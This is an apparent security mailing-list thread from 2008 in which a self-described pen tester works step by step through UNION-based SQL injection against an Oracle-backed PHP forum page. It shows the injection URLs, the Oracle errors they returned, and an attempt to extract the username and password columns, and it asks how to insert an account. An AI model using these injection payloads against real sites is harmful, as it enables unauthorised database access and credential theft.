Re: Oracle URL SQL Injection issue

[Clone <c70n3 () yahoo co in>]

One more step closer

I'm able to enumerate the column names for user table
as username and password.

http://x.y.z.a/item.php?Id=90%20union%20select%20username,password%20from%20usr

This doesn't generate an error. If I change column
names a bit I get error.

Unfortunately I'm not getting the data returned in
HTML. This is a private forum site. With the url above
I do get the page for the correct forum but nothing
about usr table. 

Any pointers?

Can I use union to insert a username and password in
usr table?


--- Clone <c70n3 () yahoo co in> wrote:

> Hmm.. with Jeff's input below I enumerate that there
> are 2
> columns. 
>
> This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
> Now I get following error:
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-01790: expression must have same datatype as
> corresponding expression in dbs.inc on line 44
>
> The I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
>
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
> And get the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-00911: invalid character in dbs.inc on line 44
>
> The functionality of the page is to generate an
> email
> page/forum email page.
>
> Any idea what's next?
>
> --- Joseph McCray <joe () learnsecurityonline com>
> wrote:
>
> > How are you coming along with this? Are you still
> > having trouble?
> >
> > Joe
> >
> > On Fri, 2008-01-18 at 00:21 +0000, Clone wrote:
> > > Hey List
> > >
> > > I am pen testing a web app that supplies sql
> > > parameters on the URL something like
> > >
> > > http://x.y.z.a/item.php?Id=90
> > >
> > > I did blind sql injection by adding AND 1=1 to
> > confirm
> > > the vulnerability.
> > >
> > > Now when I do
> > >
> > > http://x.y.z.a/item.php?Id=90&apos;
> > >
> > > I get 
> > >
> > > ociparse() [function.ociparse]: OCIParse:
> > ORA-01756:
> > > quoted string not properly terminated in
> item.php
> > on
> > > line 312
> > >
> > > Then I tried (after confirming presence of usr
> > table
> > > name)
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> > > and I get the error
> > >
> > > ociexecute() [function.ociexecute]:
> > OCIStmtExecute:
> > > ORA-01789: query block has incorrect number of
> > result
> > > columns in dbs.inc on line 44
> > >
> > > I know one valid user account in the oracle DB.
> > >
> > > Any idea what's the best strategy to move
> forward?
> > > I'm not getting any further from here so far.
> > >
> > > Any advise / helpo would be much appreciated.
> > >
> > > Cheers'
> > >
> > >
> > >
> > >       5, 50, 500, 5000 - Store N number of mails
> > in your inbox. Go to
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
> > >
------------------------------------------------------------------------
> > > This list is sponsored by: Cenzic
> > >
> > > Need to secure your web apps NOW?
> > > Cenzic finds more, "real" vulnerabilities fast.
> > > Click to try it, buy it or download a solution
> > FREE today!
> > > http://www.cenzic.com/downloads
------------------------------------------------------------------------
> > -- 
> > Joe McCray
> > Toll Free:  1-866-892-2132
> > Email:      joe () learnsecurityonline com
> > Web:        https://www.learnsecurityonline.com
> >
> >
> > Learn Security Online, Inc.
> >
> > * Security Games        * Simulators
> > * Challenge Servers     * Courses
> > * Hacking Competitions  * Hacklab Access
> >
> > "The only thing worse than training good employees
> > and losing them 
> > is NOT training your employees and keeping them." 
> >
> >         - Zig Ziglar
>
>
>
>       Download prohibited? No problem. CHAT from any
> browser, without download. Go to
> http://in.messenger.yahoo.com/webmessengerpromo.php/



      Now you can chat without downloading messenger. Go to http://in.messenger.yahoo.com/webmessengerpromo.php


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------